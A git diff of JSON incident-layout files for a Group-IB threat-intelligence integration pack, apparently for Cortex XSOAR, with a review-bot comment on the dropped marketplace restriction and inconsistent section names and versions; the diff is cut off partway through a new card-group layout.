@@ -0,0 +1,1647 @@ +{ + "close": { + "sections": [ + { + "description": "", + "fields": [ + { + "fieldId": "incident_closereason", + "isVisible": true + }, + { + "fieldId": "incident_closenotes", + "isVisible": true + } + ], + "isVisible": true, + "name": "Basic Information", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + }, + { + "description": "", + "isVisible": true, + "name": "Custom Fields", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + } + ] + }, + "description": "Layout for GIB Compromised Account Group", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotsource", + "height": 22, + "id": "incident-source-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } 
+ ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 12 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 10 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + 
"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 44, + "id": "incident-closeNotes-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": 
"ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-96ff2940-71a2-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "3f7588d0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcompromisedlogin", + "height": 22, + "id": "4610aa80-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibpassword", + "height": 22, + "id": "4bfbdd20-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibparsedlogindomain", + "height": 22, + "id": "53db3ea0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibparsedloginip", + "height": 22, + "id": "5b8dc3c0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibservicedomain", + "height": 22, + "id": "6fc2f3b0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibserviceip", + "height": 22, + "id": "761dd810-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibserviceurl", + "height": 22, + "id": "ab7ebf30-8236-11ef-9517-e9064fff04ea", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "ae89b540-8236-11ef-9517-e9064fff04ea", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibcompromisedeventsinformationtable", + "height": 106, + "id": "3f7f74e0-8a02-11ef-83f1-cb5094a16b27", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from 
Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-987638e0-71a2-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatefirstcompromised", + "height": 22, + "id": "dd8d4b80-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastcompromised", + "height": 22, + "id": "e3d6cac0-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "e9f1bff0-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "f04fd8a0-71a2-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-994d5f00-71a2-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "012ae110-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "0753b8f0-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "0d3e0130-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "164a9810-71a3-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": 
false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "edit": { + "sections": [ + { + "description": "", + "fields": [ + { + "fieldId": "incident_name", + "isVisible": true + }, + { + "fieldId": "incident_occurred", + "isVisible": true + }, + { + "fieldId": "incident_reminder", + "isVisible": true + }, + { + "fieldId": "incident_owner", + "isVisible": true + }, + { + "fieldId": "incident_roles", + "isVisible": true + }, + { + "fieldId": "incident_type", + "isVisible": true + }, + { + "fieldId": "incident_severity", + "isVisible": true + }, + { + "fieldId": "incident_playbookid", + "isVisible": true + }, + { + "fieldId": "incident_labels", + "isVisible": true + }, + { + "fieldId": "incident_phase", + "isVisible": true + }, + { + "fieldId": "incident_details", + "isVisible": true + }, + { + "fieldId": "incident_attachment", + "isVisible": true + } + ], + "isVisible": true, + "name": "Basic Information", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + }, + { + "description": "", + "fields": [ + { + "fieldId": "incident_asn", + "isVisible": true + }, + { + "fieldId": "incident_asnname", + "isVisible": true + }, + { + "fieldId": "incident_accountmemberof", + "isVisible": true + }, + { + "fieldId": "incident_accountstatus", + "isVisible": true + }, + { + "fieldId": "incident_additionaldata", + "isVisible": true + }, + { + "fieldId": "incident_additionalemailaddresses", + "isVisible": true + }, + { + "fieldId": "incident_additionalindicators", + "isVisible": true + }, + { + "fieldId": "incident_affectedhosts", + "isVisible": true + }, + 
{ + "fieldId": "incident_affectedusers", + "isVisible": true + }, + { + "fieldId": "incident_agentid", + "isVisible": true + }, + { + "fieldId": "incident_agentversion", + "isVisible": true + }, + { + "fieldId": "incident_agentsid", + "isVisible": true + }, + { + "fieldId": "incident_alertcategory", + "isVisible": true + }, + { + "fieldId": "incident_alertid", + "isVisible": true + }, + { + "fieldId": "incident_alertname", + "isVisible": true + }, + { + "fieldId": "incident_alertrules", + "isVisible": true + }, + { + "fieldId": "incident_alertsource", + "isVisible": true + }, + { + "fieldId": "incident_alerttypeid", + "isVisible": true + }, + { + "fieldId": "incident_alerttags", + "isVisible": true + }, + { + "fieldId": "incident_app", + "isVisible": true + }, + { + "fieldId": "incident_appmessage", + "isVisible": true + }, + { + "fieldId": "incident_assigneduser", + "isVisible": true + }, + { + "fieldId": "incident_assignmentgroup", + "isVisible": true + }, + { + "fieldId": "incident_attackpatterns", + "isVisible": true + }, + { + "fieldId": "incident_birthday", + "isVisible": true + }, + { + "fieldId": "incident_blockindicatorsstatus", + "isVisible": true + }, + { + "fieldId": "incident_cmd", + "isVisible": true + }, + { + "fieldId": "incident_cmdline", + "isVisible": true + }, + { + "fieldId": "incident_cveid", + "isVisible": true + }, + { + "fieldId": "incident_cvelist", + "isVisible": true + }, + { + "fieldId": "incident_cvepublished", + "isVisible": true + }, + { + "fieldId": "incident_caller", + "isVisible": true + }, + { + "fieldId": "incident_campaignname", + "isVisible": true + }, + { + "fieldId": "incident_categories", + "isVisible": true + }, + { + "fieldId": "incident_changed", + "isVisible": true + }, + { + "fieldId": "incident_childprocess", + "isVisible": true + }, + { + "fieldId": "incident_classification", + "isVisible": true + }, + { + "fieldId": "incident_cloudaccountid", + "isVisible": true + }, + { + "fieldId": "incident_cloudinstanceid", + 
"isVisible": true + }, + { + "fieldId": "incident_cloudoperationtype", + "isVisible": true + }, + { + "fieldId": "incident_commandline", + "isVisible": true + }, + { + "fieldId": "incident_commandlineverdict", + "isVisible": true + }, + { + "fieldId": "incident_comment", + "isVisible": true + }, + { + "fieldId": "incident_country", + "isVisible": true + }, + { + "fieldId": "incident_countrycode", + "isVisible": true + }, + { + "fieldId": "incident_countrycodenumber", + "isVisible": true + }, + { + "fieldId": "incident_customqueryresults", + "isVisible": true + }, + { + "fieldId": "incident_description", + "isVisible": true + }, + { + "fieldId": "incident_destinationhostname", + "isVisible": true + }, + { + "fieldId": "incident_destinationip", + "isVisible": true + }, + { + "fieldId": "incident_destinationnetwork", + "isVisible": true + }, + { + "fieldId": "incident_destinationnetworks", + "isVisible": true + }, + { + "fieldId": "incident_destinationport", + "isVisible": true + }, + { + "fieldId": "incident_detectedendpoints", + "isVisible": true + }, + { + "fieldId": "incident_detectedips", + "isVisible": true + }, + { + "fieldId": "incident_detecteduser", + "isVisible": true + }, + { + "fieldId": "incident_detectionurl", + "isVisible": true + }, + { + "fieldId": "incident_deviceexternalip", + "isVisible": true + }, + { + "fieldId": "incident_deviceexternalips", + "isVisible": true + }, + { + "fieldId": "incident_devicehash", + "isVisible": true + }, + { + "fieldId": "incident_deviceid", + "isVisible": true + }, + { + "fieldId": "incident_deviceinternalips", + "isVisible": true + }, + { + "fieldId": "incident_devicelocalip", + "isVisible": true + }, + { + "fieldId": "incident_devicemacaddress", + "isVisible": true + }, + { + "fieldId": "incident_devicemodel", + "isVisible": true + }, + { + "fieldId": "incident_devicename", + "isVisible": true + }, + { + "fieldId": "incident_deviceosname", + "isVisible": true + }, + { + "fieldId": "incident_deviceosversion", + 
"isVisible": true + }, + { + "fieldId": "incident_deviceou", + "isVisible": true + }, + { + "fieldId": "incident_deviceusername", + "isVisible": true + }, + { + "fieldId": "incident_domainname", + "isVisible": true + }, + { + "fieldId": "incident_domainregistrarabuseemail", + "isVisible": true + }, + { + "fieldId": "incident_domainupdateddate", + "isVisible": true + }, + { + "fieldId": "incident_dsts", + "isVisible": true + }, + { + "fieldId": "incident_endpoint", + "isVisible": true + }, + { + "fieldId": "incident_endpointisolationstatus", + "isVisible": true + }, + { + "fieldId": "incident_endpointsdetails", + "isVisible": true + }, + { + "fieldId": "incident_escalation", + "isVisible": true + }, + { + "fieldId": "incident_eventid", + "isVisible": true + }, + { + "fieldId": "incident_eventtype", + "isVisible": true + }, + { + "fieldId": "incident_externalcategoryid", + "isVisible": true + }, + { + "fieldId": "incident_externalcategoryname", + "isVisible": true + }, + { + "fieldId": "incident_externalconfidence", + "isVisible": true + }, + { + "fieldId": "incident_externalendtime", + "isVisible": true + }, + { + "fieldId": "incident_externallastupdatedtime", + "isVisible": true + }, + { + "fieldId": "incident_externallink", + "isVisible": true + }, + { + "fieldId": "incident_externalseverity", + "isVisible": true + }, + { + "fieldId": "incident_externalstarttime", + "isVisible": true + }, + { + "fieldId": "incident_externalstatus", + "isVisible": true + }, + { + "fieldId": "incident_externalsubcategoryid", + "isVisible": true + }, + { + "fieldId": "incident_externalsubcategoryname", + "isVisible": true + }, + { + "fieldId": "incident_externalsystemid", + "isVisible": true + }, + { + "fieldId": "incident_failedlogonevents", + "isVisible": true + }, + { + "fieldId": "incident_failedlogoneventstimeframe", + "isVisible": true + }, + { + "fieldId": "incident_filehash", + "isVisible": true + }, + { + "fieldId": "incident_filemd5", + "isVisible": true + }, + { + 
"fieldId": "incident_filename", + "isVisible": true + }, + { + "fieldId": "incident_filenames", + "isVisible": true + }, + { + "fieldId": "incident_filepath", + "isVisible": true + }, + { + "fieldId": "incident_filepaths", + "isVisible": true + }, + { + "fieldId": "incident_filerelationships", + "isVisible": true + }, + { + "fieldId": "incident_filesha1", + "isVisible": true + }, + { + "fieldId": "incident_filesha256", + "isVisible": true + }, + { + "fieldId": "incident_filesize", + "isVisible": true + }, + { + "fieldId": "incident_fileupload", + "isVisible": true + }, + { + "fieldId": "incident_firstname", + "isVisible": true + }, + { + "fieldId": "incident_fullname", + "isVisible": true + }, + { + "fieldId": "incident_highriskyhosts", + "isVisible": true + }, + { + "fieldId": "incident_highriskyusers", + "isVisible": true + }, + { + "fieldId": "incident_hostnames", + "isVisible": true + }, + { + "fieldId": "incident_huntresultscount", + "isVisible": true + }, + { + "fieldId": "incident_ipblockedstatus", + "isVisible": true + }, + { + "fieldId": "incident_ipreputation", + "isVisible": true + }, + { + "fieldId": "incident_identitytype", + "isVisible": true + }, + { + "fieldId": "incident_incidentlink", + "isVisible": true + }, + { + "fieldId": "incident_incomingmirrorerror", + "isVisible": true + }, + { + "fieldId": "incident_investigationstage", + "isVisible": true + }, + { + "fieldId": "incident_isactive", + "isVisible": true + }, + { + "fieldId": "incident_lastmirroredtimestamp", + "isVisible": true + }, + { + "fieldId": "incident_lastname", + "isVisible": true + }, + { + "fieldId": "incident_logsource", + "isVisible": true + }, + { + "fieldId": "incident_lowlevelcategoriesevents", + "isVisible": true + }, + { + "fieldId": "incident_macaddress", + "isVisible": true + }, + { + "fieldId": "incident_md5", + "isVisible": true + }, + { + "fieldId": "incident_mitretacticid", + "isVisible": true + }, + { + "fieldId": "incident_mitretacticname", + "isVisible": true + }, 
+ { + "fieldId": "incident_mitretechniqueid", + "isVisible": true + }, + { + "fieldId": "incident_mitretechniquename", + "isVisible": true + }, + { + "fieldId": "incident_mobiledevicemodel", + "isVisible": true + }, + { + "fieldId": "incident_numberoffoundrelatedalerts", + "isVisible": true + }, + { + "fieldId": "incident_numberofrelatedincidents", + "isVisible": true + }, + { + "fieldId": "incident_numberofsimilarfiles", + "isVisible": true + }, + { + "fieldId": "incident_os", + "isVisible": true + }, + { + "fieldId": "incident_ostype", + "isVisible": true + }, + { + "fieldId": "incident_osversion", + "isVisible": true + }, + { + "fieldId": "incident_objective", + "isVisible": true + }, + { + "fieldId": "incident_operationname", + "isVisible": true + }, + { + "fieldId": "incident_orglevel1", + "isVisible": true + }, + { + "fieldId": "incident_orglevel2", + "isVisible": true + }, + { + "fieldId": "incident_orglevel3", + "isVisible": true + }, + { + "fieldId": "incident_orgunit", + "isVisible": true + }, + { + "fieldId": "incident_outgoingmirrorerror", + "isVisible": true + }, + { + "fieldId": "incident_pid", + "isVisible": true + }, + { + "fieldId": "incident_parentcmdline", + "isVisible": true + }, + { + "fieldId": "incident_parentprocess", + "isVisible": true + }, + { + "fieldId": "incident_parentprocesscmd", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessfilepath", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessids", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessmd5", + "isVisible": true + }, + { + "fieldId": "incident_parentprocessname", + "isVisible": true + }, + { + "fieldId": "incident_parentprocesspath", + "isVisible": true + }, + { + "fieldId": "incident_parentprocesssha256", + "isVisible": true + }, + { + "fieldId": "incident_passwordchangeddate", + "isVisible": true + }, + { + "fieldId": "incident_phonenumber", + "isVisible": true + }, + { + "fieldId": "incident_policyactions", + "isVisible": true + 
}, + { + "fieldId": "incident_processcmd", + "isVisible": true + }, + { + "fieldId": "incident_processcreationtime", + "isVisible": true + }, + { + "fieldId": "incident_processid", + "isVisible": true + }, + { + "fieldId": "incident_processmd5", + "isVisible": true + }, + { + "fieldId": "incident_processname", + "isVisible": true + }, + { + "fieldId": "incident_processnames", + "isVisible": true + }, + { + "fieldId": "incident_processpath", + "isVisible": true + }, + { + "fieldId": "incident_processpaths", + "isVisible": true + }, + { + "fieldId": "incident_processsha256", + "isVisible": true + }, + { + "fieldId": "incident_projectid", + "isVisible": true + }, + { + "fieldId": "incident_protocol", + "isVisible": true + }, + { + "fieldId": "incident_protocolnames", + "isVisible": true + }, + { + "fieldId": "incident_referencedresourceid", + "isVisible": true + }, + { + "fieldId": "incident_referencedresourcename", + "isVisible": true + }, + { + "fieldId": "incident_registrationemail", + "isVisible": true + }, + { + "fieldId": "incident_registryhive", + "isVisible": true + }, + { + "fieldId": "incident_registrykey", + "isVisible": true + }, + { + "fieldId": "incident_registryvalue", + "isVisible": true + }, + { + "fieldId": "incident_registryvaluetype", + "isVisible": true + }, + { + "fieldId": "incident_relatedalerts", + "isVisible": true + }, + { + "fieldId": "incident_relatedcampaign", + "isVisible": true + }, + { + "fieldId": "incident_relatedendpoints", + "isVisible": true + }, + { + "fieldId": "incident_relatedreport", + "isVisible": true + }, + { + "fieldId": "incident_renderedhtml", + "isVisible": true + }, + { + "fieldId": "incident_reportname", + "isVisible": true + }, + { + "fieldId": "incident_resourceurl", + "isVisible": true + }, + { + "fieldId": "incident_rulename", + "isVisible": true + }, + { + "fieldId": "incident_sha1", + "isVisible": true + }, + { + "fieldId": "incident_sha256", + "isVisible": true + }, + { + "fieldId": "incident_sha512", + 
"isVisible": true + }, + { + "fieldId": "incident_ssdeep", + "isVisible": true + }, + { + "fieldId": "incident_scenario", + "isVisible": true + }, + { + "fieldId": "incident_selectedindicators", + "isVisible": true + }, + { + "fieldId": "incident_similarincidentsdbot", + "isVisible": true + }, + { + "fieldId": "incident_sourcecategory", + "isVisible": true + }, + { + "fieldId": "incident_sourcecreatetime", + "isVisible": true + }, + { + "fieldId": "incident_sourcecreatedby", + "isVisible": true + }, + { + "fieldId": "incident_sourceexternalips", + "isVisible": true + }, + { + "fieldId": "incident_sourcehostname", + "isVisible": true + }, + { + "fieldId": "incident_sourceip", + "isVisible": true + }, + { + "fieldId": "incident_sourceid", + "isVisible": true + }, + { + "fieldId": "incident_sourcenetwork", + "isVisible": true + }, + { + "fieldId": "incident_sourcenetworks", + "isVisible": true + }, + { + "fieldId": "incident_sourceport", + "isVisible": true + }, + { + "fieldId": "incident_sourcepriority", + "isVisible": true + }, + { + "fieldId": "incident_sourcestatus", + "isVisible": true + }, + { + "fieldId": "incident_sourceupdatedby", + "isVisible": true + }, + { + "fieldId": "incident_sourceusername", + "isVisible": true + }, + { + "fieldId": "incident_srcs", + "isVisible": true + }, + { + "fieldId": "incident_state", + "isVisible": true + }, + { + "fieldId": "incident_statusreason", + "isVisible": true + }, + { + "fieldId": "incident_stringsimilarityresults", + "isVisible": true + }, + { + "fieldId": "incident_subcategory", + "isVisible": true + }, + { + "fieldId": "incident_suspiciousexecutions", + "isVisible": true + }, + { + "fieldId": "incident_suspiciousexecutionsfound", + "isVisible": true + }, + { + "fieldId": "incident_tactic", + "isVisible": true + }, + { + "fieldId": "incident_tacticid", + "isVisible": true + }, + { + "fieldId": "incident_tags", + "isVisible": true + }, + { + "fieldId": "incident_target", + "isVisible": true + }, + { + "fieldId": 
"incident_teamname", + "isVisible": true + }, + { + "fieldId": "incident_technique", + "isVisible": true + }, + { + "fieldId": "incident_techniqueid", + "isVisible": true + }, + { + "fieldId": "incident_tenantname", + "isVisible": true + }, + { + "fieldId": "incident_threatfamilyname", + "isVisible": true + }, + { + "fieldId": "incident_threathuntingdetectedhostnames", + "isVisible": true + }, + { + "fieldId": "incident_threathuntingdetectedip", + "isVisible": true + }, + { + "fieldId": "incident_threatname", + "isVisible": true + }, + { + "fieldId": "incident_ticketacknowledgeddate", + "isVisible": true + }, + { + "fieldId": "incident_ticketcloseddate", + "isVisible": true + }, + { + "fieldId": "incident_ticketnumber", + "isVisible": true + }, + { + "fieldId": "incident_ticketopeneddate", + "isVisible": true + }, + { + "fieldId": "incident_toolusagefound", + "isVisible": true + }, + { + "fieldId": "incident_tools", + "isVisible": true + }, + { + "fieldId": "incident_urlsslverification", + "isVisible": true + }, + { + "fieldId": "incident_urls", + "isVisible": true + }, + { + "fieldId": "incident_usecasedescription", + "isVisible": true + }, + { + "fieldId": "incident_useragent", + "isVisible": true + }, + { + "fieldId": "incident_useranomalycount", + "isVisible": true + }, + { + "fieldId": "incident_userblockstatus", + "isVisible": true + }, + { + "fieldId": "incident_usercreationtime", + "isVisible": true + }, + { + "fieldId": "incident_userengagementresponse", + "isVisible": true + }, + { + "fieldId": "incident_userrisklevel", + "isVisible": true + }, + { + "fieldId": "incident_usersid", + "isVisible": true + }, + { + "fieldId": "incident_users", + "isVisible": true + }, + { + "fieldId": "incident_usersdetails", + "isVisible": true + }, + { + "fieldId": "incident_verdict", + "isVisible": true + }, + { + "fieldId": "incident_vulnerableproduct", + "isVisible": true + }, + { + "fieldId": "incident_appchannelname", + "isVisible": true + }, + { + "fieldId": 
"incident_samaccountname", + "isVisible": true + }, + { + "fieldId": "incident_similarincidents", + "isVisible": true + }, + { + "fieldId": "incident_useraccountcontrol", + "isVisible": true + } + ], + "isVisible": true, + "name": "Custom Fields", + "query": null, + "queryType": "", + "readOnly": false, + "type": "" + } + ] + }, + "group": "incident", + "id": "GIB Compromised Account Group Layout", + "name": "GIB Compromised Account Group Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json index ad4a65496e5f..87b9ce8ea5c3 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Layout.json @@ -423,7 +423,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, "w": 2, "x": 0, @@ -478,7 +478,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Person Information from GIB TIA", + "name": "Person Information from Group-IB", "static": false, "w": 2, "x": 0, @@ -519,6 +519,5 @@ "name": "GIB Compromised Account Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "6.10.0" } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json new file mode 100644 index 000000000000..1785543e7c0a --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json 
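Review bot: Dropping `"marketplaces": ["xsoar"]` from the Compromised Account layout (and from the Compromised Card layout in the later hunk) widens the layout from XSOAR-only to every marketplace, and nothing in the hunk records whether that broadening is intended; if the restriction existed for a reason, keep the key rather than deleting it alongside the version bump. The rename is also inconsistent across files: this layout and the new group layouts use "Information from Group-IB", while the Card and IMEI layouts are renamed to "Information from GIB" — settle on one spelling. The `fromVersion` values diverge in the same way: `"6.10.0"` here, `"6.0.0"` kept in the Card layout, and `"0.0.0"` in the Compromised Mule layout, whose hunk continues beyond this view.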
@@ -0,0 +1,582 @@ +{ + "description": "Layout for GIB Compromised Card Group", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotsource", + "height": 22, + "id": "incident-source-field", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, 